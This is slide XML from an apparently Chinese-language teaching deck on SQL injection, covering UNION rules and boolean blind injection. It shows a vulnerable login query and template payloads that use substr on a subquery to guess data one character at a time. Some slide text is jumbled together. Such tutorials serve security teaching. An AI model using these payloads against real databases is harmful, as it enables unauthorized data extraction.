    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="416902"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAC0692-DAC5-41B7-9C4D-E8D83DFD7F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774635" y="1215274"/>
            <a:ext cx="852692" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>盲注</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6CB80A1-6941-4F73-A06E-949C3A0DA5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1627327" y="1676939"/>
            <a:ext cx="3503966" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>盲注的本质是猜解</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="PingFangSC-Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5911BB0-8FA5-479B-8228-466774F324E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="2069354"/>
            <a:ext cx="11128526" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>Select * from user where username='admin' and password=' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{001BAB7B-3870-48E0-ADDD-6E3C874B93B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="2947351"/>
            <a:ext cx="8951880" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>=password' and (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>,1) = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>')#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8F3F8F6-0626-45C0-B388-32481255EB88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="4509118"/>
            <a:ext cx="7362776" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>=x' or (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>,1) = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>')#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA06EC0E-0CC2-4700-8DC5-8BB52B6B95CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5609158" y="5188941"/>
            <a:ext cx="5614037" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>注意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>要保证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>语句只能返回一行结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1029575611"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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35DBBDC7-4137-4E62-8E8E-511EF2EA9383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE33A0B2-9575-4FD7-9EF8-9B8416576EFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056894C6-E7D6-4D30-B4F5-E11C54893A16}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8954839D-822E-432C-ABF8-5EE9B80CE9A6}"/>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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B17FA1F-3E11-48D1-BD36-559DE6F2D38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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF34843-E312-40D6-966C-3D17A34E60A9}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E251E78C-FF33-4EA5-8ECB-BA7F83972A9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1434302" y="793451"/>
            <a:ext cx="1972090" cy="2645659"/>
            <a:chOff x="1404892" y="1201756"/>
            <a:chExt cx="3448463" cy="4626288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC92771-E232-46FD-9576-C1A00DCA270E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404892" y="1780764"/>
              <a:ext cx="3448463" cy="4047280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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pc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2531B153-C346-4B5F-9F15-E255D8568A5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404892" y="1201756"/>
              <a:ext cx="3448463" cy="708964"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形: 圆角 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591774D6-0D2E-4924-8A2A-C05E7AFCEB25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4133956" y="2281840"/>
            <a:ext cx="6623742" cy="2625438"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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4000" b="1" spc="600" dirty="0">
              <a:solidFill>
